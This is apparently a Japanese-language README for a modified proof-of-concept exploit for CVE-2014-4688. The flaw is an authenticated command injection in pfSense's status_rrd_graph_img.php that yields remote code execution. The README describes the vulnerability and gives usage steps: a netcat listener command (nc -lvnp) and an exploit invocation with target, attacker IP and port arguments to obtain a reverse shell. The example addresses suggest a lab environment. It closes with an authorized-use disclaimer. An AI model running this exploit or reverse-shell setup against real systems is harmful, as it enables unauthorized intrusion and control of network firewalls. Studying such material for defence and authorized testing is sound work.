
CVE-2014-4688の修正版概念実証エクスプロイト。pfSense status_rrd_graph_img.phpのコマンドインジェクション脆弱性で、SSL処理付きの認証済みリモートコード実行を可能にする。
CVE-2014-4688 用の修正版 Exploit-DB プルーフ・オブ・コンセプト (pfSense status_rrd_graph_img.php コマンドインジェクション)
このリポジトリには、CVE-2014-4688 のオリジナルの Exploit-DB プルーフ・オブ・コンセプトの修正版が含まれており、pfSense バージョン ≤ 2.1.3 に影響します。
この脆弱性は status_rrd_graph_img.php コンポーネントに存在し、database パラメータの入力サニタイズが不適切なため、認証されたユーザーが任意のシステムコマンドを実行できるようになります。
status_rrd_graph_img.php認証されたユーザーは、脆弱なエンドポイントに提供される細工された入力を介して、任意のシェルコマンドを注入できます。
リスナーを起動:
nc -lvnp <LPORT>
概念実証:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
このリポジトリは、許可されたセキュリティ研究、教育、および管理されたテスト目的のみで提供されます。 明示的な許可なくシステムに対して不正に使用することは、違法であり非倫理的です。